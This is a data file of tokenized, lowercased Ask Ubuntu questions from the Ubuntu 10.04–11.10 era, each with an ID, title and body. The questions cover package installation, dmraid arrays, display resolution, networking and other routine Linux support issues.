113387	running a program that has no extension	i was given a program to run on my machine ... .the file is just the name of the program with no extension . there was n't very many instructions , all that was included was commands i could type ... one of them was programname -h doing this would supposedly give me more instructions on what to do ... but how do i run a program so i can do this . i have working knowledge of linux , but not a whole lot dealing with program installations , so pardon if this is a noob question answered elsewhere ( i did a search but could n't find a match ) .
113390	how does ubuntu run without wubi root file	this is crazy i know , my recent experiment gave me a unforgettable experience , i usually use ubuntu as a wubi installation because it is easy to backup my 10.10 system and give a try to new versions without any problems . so after i booted to ubuntu 10.10 i can rename , move or even delete my root file in /host/ubuntu/disks directory , then i used to boot my 11.10 system directly by renaming current 10.10 root file and copying 11.10 root file to the same directory , how is that possible , does ubuntu run completely on ram ? or is there a cached root file elsewhere ? i 'm confused , i think i can even remove my hard disk when ubuntu is running ( if swap disk not included in the same disk ) but in the windows , it is a dream ! ! ! , how is this possible ?
113392	are there any advantage using wine over vm to run windows programs ? ( or vice versa )	i was wondering how wine compares to vm when running windows applications and what the pros and cons are for each ?
113393	is there a way to search an mpd library with the music lens ?	i use mpd , along with the gui client sonata to play all my music . it works quite well , but none of my music shows up in the music lens ( since i do n't use banshee or rhythmbox , it 's just empty ) . has anyone created an mpd scope for the music lens so that my music would show up ? i thought i read in some now-forgotten place that someone was working on one . thanks !
113398	ca n't install package ( cinnamon )	i am trying to install cinnamon 1.4 on my ubuntu vm ( 10.10 ) and i can not get this to work . if someone could be nice enough to explain what i 'm doing wrong i would really appreciate it ! https : //launchpad.net/~gwendal-lebihan-dev/+archive/cinnamon-stable adam @ ubuntu : ~ $ sudo add-apt-repository ppa : gwendal-lebihan-dev/cinnamon-stable executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /etc/apt/secring.gpg -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver hkp : //keyserver.ubuntu.com:80/ -- recv 109c2938f84496d6acb6d805a777609328949509 gpg : requesting key 28949509 from hkp server keyserver.ubuntu.com gpg : key 28949509 : `` launchpad gwendal le bihan '' not changed gpg : total number processed : 1 gpg : unchanged : 1 adam @ ubuntu : ~ $ sudo apt-get update w : failed to fetch http : //ppa.launchpad.net/gwendal-lebihan-dev/cinnamon-stable/ubuntu/dists/natty/main/source/sources 404 not found adam @ ubuntu : ~ $ sudo apt-get install cinnamon reading package lists ... done building dependency tree reading state information ... done e : unable to locate package cinnamon
113402	is it normal for ubuntu 11.10 to use 1 gb of memory ?	on my older system i ran the 32 bit version of ubuntu with 4 gb of ram and noticed it rarely come near 1 gig of usage.i have my new system running with the 64 bit version.the new system is a quad core with 8 gb of ram and ubuntu is using 1 gig now.is this normal ? i have run top and noticed certain processes such as compiz , xorg and lightdm seeming to be using a lot.i also upgraded in my new system with an msi radeon hd6450 graphics card that s supposed to have 2 gigs on it .
113405	how to install software 's by default in new volume virtual box running on mac	initially i had installed ubuntu 11.10 on virtualbox running on mac os , with hard-disk storage of 8gb . as i was left with only 50mb space , i increased the diskspace on the virtualbox by another 8 gb ( total 16gb ) using mac terminal . when i logged into ubuntu i was seeing 2 volumes 8gb ( original ) and 8gn ( newly created ) . i mounted the new volume and the total diskspace now is shown as 16gb . the issue is that when downloading any software it gives me an error saying diskspace is low as its trying to install on origianl volume which has 50mb space . how do i make new software to install on new volume by default .
113410	no internet with a realtec rtl 8111/8168b chip set	i am new to ubuntu 11.10 in fact have only used windows . i am having difficulty getting internet working under ubuntu . hardware - asus 24 '' all in one computer with a realtec rtl 8111/8168b pci express rev 6 chip set . i have tried to force the ip address through the network manager . the light on the router to green but still could not ping any addresses , and the manager was saying i was connected and had the ip adresses that i forced with ifconfig .
113411	chrome embed vlc player could n't playback mp4	i trying to embed vlc player in chrome to playback mp4 video , but with no success . what i did : 1 ) installed vlc player sudo apt-get install vlc . 2 ) visit chrome : //plugins , disabled vlc multimedia plug-in , enabled vlc multimedia plugin ( compatible totem 3.0.1 ) . able to play ogg video but not mp4 video 3 ) visit chrome : //plugins , disabled vlc multimedia plugin ( compatible totem 3.0.1 ) , enabled vlc multimedia plugin plugin not found how do i get mp4 playback with vlc player for chrome , firefox is running fine . can someone give a clue on what 's the different between these 2 plugins and why vlc multimedia plugin without totem wo n't work on chrome ?
113412	how do i load abobe flash ?	i am very new to ubuntu . so far i am happy with it but i need to learn how to download flash . well , i have downloaded it but i do n't know what to do next . or another opensource program that works . i am running ubuntu 11.04 and firefox . there is much to learn and just need a little direction . thank you for your help .
113413	unmet dependencies while installing imagemagick on ubuntu 10.04	i was trying to install imagemagic on 10.04 $ sudo apt-get -f install imagemagick go the below error reading package lists ... done building dependency tree reading state information ... done you might want to run `apt-get -f install ' to correct these : the following packages have unmet dependencies : imagemagick : depends : libmagickcore2 ( > = 7:6.5.7.8 ) but it is not going to be installed depends : libmagickwand2 ( > = 7:6.5.7.8 ) but it is not going to be installed recommends : libmagickcore2-extra but it is not going to be installed postgresql-8.4 : depends : libkrb53 ( > = 1.6.dfsg.2 ) but it is not installable depends : postgresql-common ( > = 109~ ) but 106ubuntu1 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . how can i install libkrb53 ? what is this package for ? mithun @ testserver : ~ $ sudo apt-get install libkrb53 reading package lists ... done building dependency tree reading state information ... done package libkrb53 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : libkrb5-3 libkrb5support0 libk5crypto3 libgssapi-krb5-2 krb5-pkinit e : package libkrb53 has no installation candidate
113419	how can i reset $ path to its default value in ubuntu 11.10 ?	i accidentally unset all the directories of $ path while trying to add a new one in ~/.bashrc . i opened a new terminal window as i was editing and now $ path is empty . i 'm worried if i boot from another drive to find the $ path i wo n't be able to boot into this drive again . basically , what is the default result of echo $ path ?
113420	on restart server ethernet went down saying not configured !	i justy have configured my dhcp server with static ip . after configuration dhcp server & routers were working fine . but after restarting server network connectivity went off . there are two lan cards but none of them is up.i tried setting up manually ip address again but it remains same . when i executed sudo /etc/init.d/networking restart i got this message * running /etc/init.d/networking restart is deprecated because it may not enable again some interfaces * reconfiguring network interfaces ... /bin/sh : can not open /etc/iptables_rules : no such file failed to bring up eth0 . i have configured my server according to this what is it the problem with ubuntu 11.10 or some configuration error . i am not getting it please help me .
113423	how to remove the glow around an icon when it requests attention ?	in the screenshot , you can see that i have the unity rotated plugin . i modified the files in /usr/share/unity/4 that removed the outer squares around the icons so they simply float , but , i am stuck with the glowing box around an icon whenever it needs attention . what should i do to remedy this ? edit : this is only on 11.10 . 12.04 seems to have fixed the problem .
113427	how to add custom scripts while making a livecd customization	i want to add custom scripts while making a customization of an ubuntu livecd .
113428	tablet drawing horizontal , vertical and diagonal lines on its own / pressure sensitivity issues	i 'm running ubuntu 11.10 and my tablet makes horizontal , vertical , and diagonal lines , whenever i draw something . here 's an example : i changed the tablet mode to `` screen '' , but this is what 's causing the problem , if i disable it then i lose pressure sensitivity . it works fine with my other computers , just not with my laptop . my other computers have jolicloud andzion running on them and gimp works fine on those with my tablet . does anybody have any ideas about what i should do ?
113434	how to make qt applications to choose regular style font by-default ?	in modern ubuntu versions ( 11.10 , 12.04 ) there is an additional style for ubuntu font called 'medium ' it 's slightly thicker than a 'regular ' style user by default . the problem is that all qt apps just suddenly start using that 'medium ' style , instead of 'regular ' which is used by default in all gtk apps . how to fix this without removing /usr/share/fonts/truetype/ubuntu-font-family/ubuntu-m*.ttf ?
113439	ufw is not logging how do i troubleshoot ?	i have set logging to high . i am not seeing any log messages . i do see the empty ufw.log file . no messages in dmesg
113443	how to update windows phone from ubuntu ?	i do n't have an access to windows pc and i do n't know how to update the os of my phone . in windows os i can use ruu software which does the job quite nicely , but i ca n't find any alternatives for ubuntu . i have hd2 phone which comes with windows 6.5 os and i have updated to custom windows 6.5 os . how to update os of my phone from ubuntu 11 ?
113447	how to reset desktop	i tinkered with gconfeditor and compizconfig and something else .. now i ca n't see the files and folders on the desktop . and also can not right click on the desktop . i tried this : gconftool-2 -- type bool -- set /apps/nautilus/preferences/show_desktop false without success .
113456	how can i fix window placement via ccsm for firefox ?	( ubuntu 11.10 oneiric with unity 3d ) in compizconfig settings manager ( ccsm ) i activated the plugin place windows ( ? in german : fenster platzieren ) and configured it as follows : this works perfectly for thunderbird , but firefox always opens the first window on the actually focused viewport and not where it should . a new window when firefox is already running opens at the configured workspace , even if firefox runs on another viewport . the described problem appears when i open firefox out of the dash or from the launcher or listing it in startup applications ( command : /usr/bin/firefox ) . when i open it by clicking a link in thunderbird everything runs as it should . furthermore : i started firefox from the launcher and switched to expo mode ( by pressing workspace switcher in launcher ) . then i saw appearing firefox on the configured workspace for a split second before finally be opened on the focused viewport . when i restart firefox after a crash or when it did n't close correctly before ( it starts then with what you see in about : sessionrestore ) it opens on the configured viewport . i found out that it works correctly when i set preferences â general â startup to show my home page or show a blank page . firefox opens on the focused viewport and not where it should when this is set to show my windows and tabs from last time .
113465	using `` sed '' to find and replace a non atypical string	i need to use sed in the terminal ( no other option , i 'm afraid ) and i need to find and replace all sequences of four or more digits ( no white spaces ) with a specific word `` brad '' . i have tried and tried to understand the manual but it is just so bad . how do i do this ? and while i am looking for the exact command , i would appreciate an explanation of why it works the way it does ( the exact command used here that is ) .
113468	untrusted connection show	yesterday i have login into yahoo account but when i have pressed submit button the untrusted connection message show . after this message yahoo mail page did n't open . next day , again i have login into yahoo account by another id then same message show . i ca n't understanding why this happening . how can i solve this problem .
113474	what hinders ubuntu from getting traction in the professional field ?	if this is not the place to ask this , please forgive this ubuntu cub , i want to ask , what do people do with ubuntu ? as an ask ubuntu user i can see that most of the users ( including myself ) are asking questions about entertainment related problems . is that all ? no commercial use with it ? do people make fun of ubuntu or just pretending to be ubuntu users and use windows secretly ? please do n't hate me or make fun of me , i know lots of people trying to make ubuntu even better , and i know it 's better than windows ( if adobe software just work on ubuntu , i wo n't see windows logo on my monitor anymore ) . what hinders ubuntu from getting traction in the professional field ?
113476	removing unity and gnome panel in xubuntu	after running the update manager for the first time and rebooting , i am greeted with a few ubuntu applications and when i logout i can see the unity and gnome shell option in the login screen . how can i remove unity and gnome panel without breaking xubuntu-desktop ? i want to completely remove the non-xfce options from the login manager e.g . lightdm/gdm .
113477	wine + microsoft access + windows share	i have a vb6 application running on wine . that application uses a mdb database , but the mdb file is on a windows share ( iomega storcenter ) . i mount the share via fstab , and assign the letter `` d : '' via wine . when i run the application fires a exception because it ca n't lock the mdb file ( create a lock file ) . the fstab line i use is : //iomegastorcenter/public/server /home/jmm/iomega cifs , uid=wine , gid=users , fmask=7777 , dmask=0777 , iocharset=utf8 , codepage=unicode , unicode 0 0 anybody knows how can i mount the share to avoid the exception ?
113480	can i change architecture from 32 to 64bits without using a cd ?	i accidentally installed the wrong architecture and would like to `` upgrade '' to amd64 . is there anyway , without downloading the am64 iso and burning it .
113484	issues with 11.10 display resolution	i want to increase the resolution of my acer aspire one d250-1326 which has ubuntu 11.10 installed . the native resolution is 1024x600 and i want to increase it to 1440x810 or 135 % . i 've tried two methods that both use xrandr ... creating a new resolution mode and applying it to my display , and scaling the display . this picture shows the commands i entered into the terminal to create a new resolution mode : enter `` xrandr -q '' to show that the current resolution is 1024x600 . enter `` cvt 1440 810 60 '' to find the modeline for a resolution of 1440x810 at 60hz . enter `` xrandr -- newmode ... '' to create the custom mode . enter `` xrandr -- addmode lvds1 ... '' to apply the mode to my netbook display . here is where i experience the `` badmatch '' error . note : when i enter `` xrandr -- addmode vga1 ... '' instead , the mode is successfully applied to the vga1 display . the second method i attempted is scaling the display . i had success using this method when i used ubuntu 11.04 . now for some reason , when i use the same scaling command , my mouse becomes constrained to the top-left portion of the screen . here are the steps i took : enter `` xrandr -q '' to show the current state of the display . note : you can see the mode i created during the previous method . again , i was not able to apply it to the lvds1 display , but i could apply it to vga1 . enter `` xrandr -- output lvds1 -- scale 1.35x1.35 '' to scale the display . after this is done , the resolution is changed but the mouse can not move any lower than you see here in the picture . i also tried using different panning options without any success . one route i did see is to revert a patch which is said to solve the scaling problem . i have not been able to figure out how to perform this action though . here is a link , with the confirmation near the bottom : bugs ( dot ) freedesktop.org/show_bug.cgi ? id=39949 ( dang spam prevention , ca n't post > 2 links ) i would appreciate your help solving this problem . otherwise i guess i 'll just go back to 11.04 . thanks
113488	touchpad on gateway lt2802u netbook does n't work	i installed xubuntu oneiric on a netbook . the synaptic device is recognized by the system and back in lucid it worked . but now it wo n't work anymore . grep -b 5 mouse /proc/bus/input/devices1 gave me i : bus=0011 vendor=0002 product=0007 version=01b1 n : name= '' synps/2 synaptics touchpad '' p : phys=isa0060/serio2/input0 s : sysfs=/devices/platform/i8042/serio2/input/input9 u : uniq= h : handlers=mouse0 event9 please help me : )
113490	where does gnome-power-statistics get its data from ?	gnome-power-statistics is run when you click on the battery icon in the top panel of a laptop . it shows battery history such as charge and rate , as well as statistics such as discharge profile and discharge accuracy . the more you use your laptop , the more data it shows , and the more accurate the battery time-to-empty predictions are . so , where does gnome-power-statistics get the raw historical data from ? and , if it also saves any data , where does it save it to ?
113500	why am i not asked for password at startup ?	i have xubuntu 11.10 . when i log out and in ( without restarting the computer ) i am always required to chose a session and provide a password for entering that session . but when i restart the computer i am logged directly into my last session ( or asked to chose between my saved sessions - as an already logged user - , if i check to be prompted on login ) without any password being asked . in all the other normal circumstances i am asked for my password ( installing in terminal , accessing synaptic , using root access etc ) - except when opening my computer , which is odd . in setting manager , sessions and startup , i see ( and have checked ) the options regarding the login , logout and saving sessions but there seems to be no option for the startup as such , just for sessions . is there such an option ? there must be , i have the impression that after the first os installation ( some 4 months ago ) i was beeing asked for password when starting my pc . how could i turn that back ? -- considering some answers i got , i add the following : i can not find where to set the login window to appear ( the one that in ubuntu is system > administration > login window ) . if i set to be prompted upon login , as i said ( in setting manager , sessions and startup ) , that is a different matter : i am in fact already logged in as user when asked to chose between user-saved sessions . i do n't seem to find the settings for system -- > login window so as to check the option to be prompted to chose sessions ( even ubuntu or lubuntu sessions if installed ) at startup . --
113506	ubuntu 10.04 web browsers do not render some fonts	i tried opening page which uses this font http : //fonts.googleapis.com/css ? family=poiret+one however my web-browser whether it 's chrome or firefox does n't render it and just shows simple font ( i thinks times new roman ) however if i ssh to other machine which is also running linux and open same page with web browser inside it with x-server everything works fine . anyone knows why ? how to fix it ? edit : html has this in < head > tag < head > < link href='http : //fonts.googleapis.com/css ? family=poiret+one ' rel='stylesheet ' type='text/css ' > < /head > should n't my browser download that font automatically ?
113507	mysql not working after apache2 reinstall ?	earlier i had a problem that had to do with .htacess files but i got that fixed but in the process i thought it would be good to re install apache2 . that fixed all web server problems , but when i tried to use mysql , it gave me this error : error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) please help : o. i 'm ok with remaking all databases but i cant get mysql to work , so i basically cant do anything with my server until this is fixed . thanks in advance : )
113511	moving unity to the right side	i know it happens when i 'm changing the language to hebrew but i still want it in english . how do i do this ? if i ca n't is there any schedule for this feature being added ?
113512	shotwell photos for email	how do you compress photos in shotwell prior to attaching them to an email . the average jpeg in shotwell is over 1 mb far too big for emailing . the help file is n't any use .
113514	how can i remove icons from the gnome shell panel ?	i tried to use the gmenu-simple editor , but it said it ca n't find it . it 's just for a good look .
113518	printer state : idle - /usr/lib/cups/backend/dnssd failed	a printer was installed and worked but does not now . a job is successfully submitted , but keeps waiting there for printing ( as seen from lpq command ) . ping to printer works fine . ( the printer is on and works as it prints from windows . ) but on the printer property , it shows printer state : idle - /usr/lib/cups/backend/dnssd failed . the following command does not help either . sudo service avahi-daemon restart does any one has a solution ? thank you for help .
113521	change boot order on grub	i recently installed ubuntu 11.04 inside windows 7 on my younger brothers laptop because he is slowly making the change over , at the moment when he turns the laptop on windows 7 is selected and i would like ubuntu to be the first option , how do i change it ?
113529	multiboot system advice ?	i 'm thinking about doing a multiboot install on my laptop . i have 250gb of hdd space . i want my main partition to be ubuntu , and i want to keep everything on there ( media , preferences , etc . ) rather than having a dedicated home partition . am i able to , for example , let opensuse access my ubuntu partition and read /ubuntu/home/user/music as opensuse/home/user/music ? can this also be done for preferences for applications , such as libreoffice ? i have that feeling that this wo n't work , but i figured it 's worth a shot . also , i 'm considering using fedora , opensuse , debian , and linux mint as my alternative distros . this is probably unrelated , but does anyone else recommend better distros to replace/go alongside these ? finally , what are recommended install sizes for these distros if i 'm not going to be putting media on them ? thanks all !
113532	where is `` system '' or `` preferences '' ?	i have been staring at the same screen trying to find the system button or preferences . i was reading an article on how to find the system button , and it said it 's under preferences . now where is preferences ? i ca n't even find that !
113534	banshee starts a song in a random section	i 'm having a bit of an annoying problem with banshee . i have a library that 's not so big , only 300-400 songs . however , i 'm the problem arises when i play songs . when i double click to play a song , it plays normally , as expected . but during a playlist or my whole library , or even a playlist with a single song being played , something funny happens : it starts the next track f.ex . in the middle , but not at the beginning . rarely at the beginning . this is quite annoying , and i do n't really have an idea what may cause it . it used to work completely fine before , and i find it hard to believe that it may be a matter of a corrupted database in banshee . has anyone else had this problem , and if so , is there any solution to this ? i 'm sorry if this is the wrong place to ask , but i believe it 'd be appropriate since i do run ubuntu ( 11.10 ) and banshee is the default player .
113539	full disk encryption with luks : auto mount second volume	truecrypt on windows can auto mount volumes that use the same passphrase as the boot volume . you enter the passphrase only once . is there a way to do this with luks ? background : i 'm currently migrating from windows to ubuntu . i set up ubuntu 11.10 with luks full disk encryption . i use a second hard drive that is still a truecrypt ntfs volume . i want to change that .
113540	how to access windows 7 remotely from ubuntu ?	i ca n't seem to connect remotely to a friend 's windows machine using vinagre . my friend is using realvnc free edition as a server and he operates windows 7 . so how can i set it up so that i can remotely access his desktop ?
113544	how to reduce pdf filesize ?	i have a 72.9mb pdf file that i need to shrink into under 500kb . the file was a jpeg image that i had scanned , and then converted to pdf . can someone please offer any suggestions ?
113548	obtain passphrase programatically before intial login with ecryptfs ?	we are learning about/experimenting with ecryptfs ( ubuntu server 10.04 ) . we are trying to set up users on our server programmatically using a bash script which we can do , including encrypting their `` /home '' . we are trying to avoid having to log into a new account to generate the ecryptfs passphrase . once we do this , we can recover the passphrase via bash from another account , but have hoping to avoid the `` manual '' log in step . we should mention , this is an internet facing server , that we are doing our best to `` lock it down '' , that we are trying to prevent users from changing their passwords `` willy nilly '' , and so will require them to make password change requests , and that the point of the encryption is to keep users out of each others accounts ( there are other , perhaps better ways to address this need - including just `` hiding '' their /home though the encryption also forces a log in , in addition to ssh ) . so , is there a way to script a login ( we 've seen posts on google that this is n't possible ) that replaces the manual one so that the passphrase gets created and they we can capture and record it using ecryptfs-unwrap-passphrase .
113551	installing ubuntu 11.10 on hp envy 15 - partition problems	i am trying to install ubuntu 11.10 on my hp envy 15 , however i am getting some problems . when i come to the partitioning section of the installation i am given my 4 partitions that i have . i change the partition of my 450 gb to 420 gb , so that i can use that 30gb space that i free up to install ubuntu on it . after i do this step , instead of seeing the keyword to the 30gb i see unusable . i have read that there can not be more than 4 partitions somewhere for a ubuntu installation , but that is not true , because i just installed ubuntu 11.10 on my lenovo which has the same amount of partitions as my envy ( i do get problems on my lenovo with installing ati drivers but that is a completely different story ) . does anybody have an idea of why i am getting an unusable notification next to my freed up space ?
113554	remove both unity and gnome ?	tl ; dr : can i remove completely unity and gnome3 but keep compiz ? long version : i really gave a go both to unity and to gnome3 . i really did . i just ca n't bear them . i need something that i can rely on for a long while . i decided to do away with desktop managers ; i want to build my own desktop environment with independent parts . my requirements : my workflow is very dependent on compiz ; i do n't care about the effects , but i use a lot of it 's key bindings to move/resize/manage windows , as well as workspaces , and i could not find another window manager that has everything i need . so the window manager has to be compiz , unless you know another wm with the same flexibility . alternatively , i can use xmonad , but i like it less . i need something that can replace applets , in order to be able to connect to network , control sound , hold pidgin indicator , etc . some sort of light-weight dock maybe ? if it can use my icons and my theme by default , it would be great ( instead of trying to replicate the theme ) . desktop management would be nice as i often drag-drop stuff from and on it temporarily . but it 's not mandatory ( is there an independent app for that ? ) . my questions : how would i go about completely remove unity and gnome and keep compiz ? can i safely just apt-get remove them ? is there anything i should know ? the purpose is to build a rock-solid desktop ; it should not end up being even less stable than the defaults ( i am thinking in particular of nm-applet , which always worked perfectly for me , contrary to other network managers ) . notes : i could use fallback session , or install gnome2 , xfce or lmde or similar , but i really just want to do away with the whole monolithic window manager + shell paradigm . i want flexible , loosely coupled parts . i know about cinnamon and mate , and i really admire the work that mint is doing ( some sanity , finally ) , but i really would rather have a light-weight dock that only launches stuff ( as opposed to taking care of a lot of other things ) .
113557	what classifies an application as 'installed ' in ubuntu ?	i would like to know what causes ubuntu and/or synaptic to recognize a program as being installed . is there an equivalent of the windows registry that an application has to have a entry in ? does a program have to be installed from a . *deb package to be classified as installed and show up in synaptic ? and where are files for an installed program usually kept ? i know that configuration files are kept in /home/x/ but not much else .
113561	how to modify/fix incorrectly detected dmraid ( fakeraid ) raid 10 array	i 'm trying to get dmraid to properly detect an existing raid 10 array , which is working fine within windows 7 . in summary , the drive setup and bios partitioning is as following : 2 x ssd ( 120 gb ) , raid 0 . partitioned into : 180 gb ( win7 ) and 58 gb ( ubuntu ) . both detected and mounting fine in ubuntu . 4 x hdd ( 2 tb ) , raid 1+0 . single 4tb partition . not working in ubuntu . the ubuntu installation itself is on a partitioned striped disk pair , and works fine . the two partitions ( 180 gb and 58 gb ) correspond to the following lvm 's ( i 've taken the liberty to format the data for readability ) : # $ sudo dmsetup info /dev/dm- { 1,2,3,4,5 } | -- -- -- -- -- + -- -- -- -- + -- -- -- -- -- -- -- -+ -- -- -- -- -- -+ -- -- -- -- -- + -- -- -- -- | | dev/dm-0 | ubuntu | pdc_hjijcjji | container | | 58 gb | | dev/dm-1 | ubuntu | pdc_hjijcjji1 | / | ext4 | 54 gb | | dev/dm-2 | ubuntu | pdc_hjijcjji2 | | extended | 4.3 gb | | dev/dm-3 | win 7 | pdc_fjhhdeeg | container | | 180 gb | | dev/dm-4 | ubuntu | pdc_hjijcjji5 | | swap | 4.3 gb | | dev/dm-5 | win 7 | pdc_fjhhdeeg1 | | ntfs | 180 gb | | -- -- -- -- -- + -- -- -- -- + -- -- -- -- -- -- -- -+ -- -- -- -- -- -+ -- -- -- -- -- + -- -- -- -- | the raid 10 array ( which is the one i need help to get it working within ubuntu ) consists of four 2tb disks , and give a resulting 4tb array . it seems as if dmraid is aware of this array , given the following output : # $ sudo dmraid -r | -- -- -- -- -- + -- -- -- -- + -- -- -- -- -- -- -- -- -- + -- -- -- -- + -- -- -- -- -+ -- -- -- -- -- -- -- -- + -- -- -- -- -| | device | format | name | type | status ? | size ( sectors ) | ? | | -- -- -- -- -- + -- -- -- -- + -- -- -- -- -- -- -- -- -- + -- -- -- -- + -- -- -- -- -+ -- -- -- -- -- -- -- -- + -- -- -- -- -| | /dev/sdf | pdc | pdc_fjhhdeeg | stripe | ok | 175781248 | data @ 0 | | /dev/sde | pdc | pdc_fjhhdeeg | stripe | ok | 175781248 | data @ 0 | | /dev/sdd | pdc | pdc_bjibibahah-1 | stripe | ok | 1758766336 | data @ 0 | | /dev/sdc | pdc | pdc_bjibibahah-1 | stripe | ok | 1758766336 | data @ 0 | | /dev/sda | pdc | pdc_bjibibahah-0 | stripe | ok | 1758766336 | data @ 0 | | /dev/sdb | pdc | pdc_bjibibahah-0 | stripe | ok | 1758766336 | data @ 0 | | -- -- -- -- -- + -- -- -- -- + -- -- -- -- -- -- -- -- -- + -- -- -- -- + -- -- -- -- -+ -- -- -- -- -- -- -- -- + -- -- -- -- -| which throws me off a bit , since i 'd expect the array , pdc_hjijcjji , to show up here as well . perhaps , since it 's a partition within a striped disk , it is included within pdc_fjhhdeeg . in any case , the striped array is running fine , so i 'm not too worried about it . pdc_hjijcjji shows up when running dmraid -s : # $ sudo dmraid -s | -- -- -- -- -- -+ -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- + -- -- -- -- -- -- -- | | name | pdc_bjibibahah | pdc_fjhhdeeg | pdc_hjijcjji | | -- -- -- -- -- -+ -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- + -- -- -- -- -- -- -- | | | superset | active set | active set | | size ( -h ) | 1.677 tb | 167.6 gb | 54.0 gb | | size | 3517532672 | 351562496 | 113281024 | | stride | 128 | 128 | 128 | | type | raid10 | stripe | stripe | | status | ok | ok | ok | | subsets | 2 | 0 | 0 | | devs | 4 | 2 | 2 | | spares | 0 | 0 | 0 | | -- -- -- -- -- -+ -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- + -- -- -- -- -- -- -- | # size is in blocks of 512 bytes . where pdc_bjibibahah seems to correspond to the raid10 array , except that it has a weird size ( 1.677 tb , as apposed to approx 4 tb ) . trying to activate this using dmraid -ay results in a mounted 1.677 tb device with is reported as unallocated data . running sudo dmraid -s -si on the bjibibahah array : # $ sudo dmraid -s -si | -- -- -- -- -- -+ -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- | | name | pdc_bjibibahah | pdc_bjibibahah-0 | pdc_bjibibahah-1 | | -- -- -- -- -- -+ -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- | | | superset | subset | subset | | size ( -h ) | 1.638 tb | 1.638 tb | 1.638 tb | | size | 3517532672 | 3517532672 | 3517532672 | | stride | 128 | 128 | 128 | | type | raid10 | stripe | stripe | | status | ok | ok | ok | | subsets | 2 | 0 | 0 | | devs | 4 | 2 | 2 | | spares | 0 | 0 | 0 | | -- -- -- -- -- -+ -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- | i 've tried configuring the arrays manually , but with no success , and the man page is n't proving all too helpful either . if anyone has a suggestion as to how to configure dmraid , or to convince it to change the configuration of the raid10 array , i would be really grateful . here are a few outputs , should it be relevant : $ sudo dmraid -v dmraid version : 1.0.0.rc16 ( 2009.09.16 ) shared dmraid library version : 1.0.0.rc16 ( 2009.09.16 ) device-mapper version : 4.20.0 $ sudo dmsetup -- version library version : 1.02.48 ( 2010-05-20 ) driver version : 4.20.0 $ uname -srvm linux 3.0.0-16-generic # 28-ubuntu smp fri jan 27 17:44:39 utc 2012 x86_64 $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 11.10 release : 11.10 codename : oneiric also , the bios raid setup of the raid10 array match the following disks within ubuntu : code : | -- -- -- -- -+ -- -- -- -- -- -- + -- -- -- -- -- -- -- | | port : id | assignment | os disk name | | -- -- -- -- -+ -- -- -- -- -- -- + -- -- -- -- -- -- -- | | 01:01 | ld 1-1 | /dev/sda | | 02:01 | ld 1-2 | /dev/sdb | | 03:01 | ld 1-3 | /dev/sdc | | 04:01 | ld 1-4 | /dev/sdd | | -- -- -- -- -+ -- -- -- -- -- -- + -- -- -- -- -- -- -- | update : i forgot to mention that i 'm on a crosshair v motherboard , using the built in amd sb950 controller . update 2 : when running sudo dmraid -s -ccs pdc i get the following error messages : error : pdc : wrong # of devices in raid set `` pdc_fjhhdeeg '' [ 1/2 ] on /dev/sdf error : pdc : wrong # of devices in raid set `` pdc_fjhhdeeg '' [ 1/2 ] on /dev/sde error : pdc : wrong # of devices in raid set `` pdc_bjibibahah-1 '' [ 1/2 ] on /dev/sdd error : pdc : wrong # of devices in raid set `` pdc_bjibibahah-1 '' [ 1/2 ] on /dev/sdc error : pdc : wrong # of devices in raid set `` pdc_bjibibahah-0 '' [ 1/2 ] on /dev/sdb error : pdc : wrong # of devices in raid set `` pdc_bjibibahah-0 '' [ 1/2 ] on /dev/sda *err* if i omit the specifier pdc , and just write sudo dmraid -s -ccs i get the even more cryptic : *err* *err* *err* update 3 : i 've managed to remove the badly configured array using sudo dmraid -re as suggested in an askubuntu qa here . i 'm still getting the `` error : pdc : wrong # of devices in raid set ... '' errors , which seem to be impeding further progress . i 'll keep searching for solutions to this problem . edit : is there any information i can add that would help anyone help me ?
113566	how do i remove the driver installed from nvidia.com ?	i have updated my graphics card with nvidia-linux-x86_64-295.20 driver and since then the screen turns white with black vertical lines at startup , shootoff and reboot . since then i have tryed to change it with the drivers at `` alternative drivers '' and none of them works right , the same bug happens . what can i do to solve this issue . thank you
113570	why ca n't i choose output sound for each application ?	i am using dual monitors , and i want to be able to play a movie with sound on the tv ( through vlc or something ) and then play youtube og some games with my headphones on my laptop . is there anyway i can choose what hardware each application uses ? i 've tried using pavucontrol , but am not given an option to change the output device : and it does n't make any difference if i click the lock icon on the right edit : jeggy @ localhost : ~ $ sudo aplay -l **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : alc665 analog [ alc665 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 1 : alc665 digital [ alc665 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 do n't know if this helps with anything ?
113573	how to run facial recognition on ubuntu 11.10 ?	i have been dual booting ubuntu on my alienware m11x r2 for about two years now , and everything works so nicely on ubuntu that i rarely use windows anymore . i always liked how the integrated webcam was used in widows for a facial recognition login , either in combination with password , or on its own , depending on your setting ; however , i have been unable to find a way on running a similar application on ubuntu , currently running 11.10 . if anyone has a solution to this i would like to hear it , for the same reason that i use an unstable version of ubuntu : i appreciate the bells and whistles it has to offer .
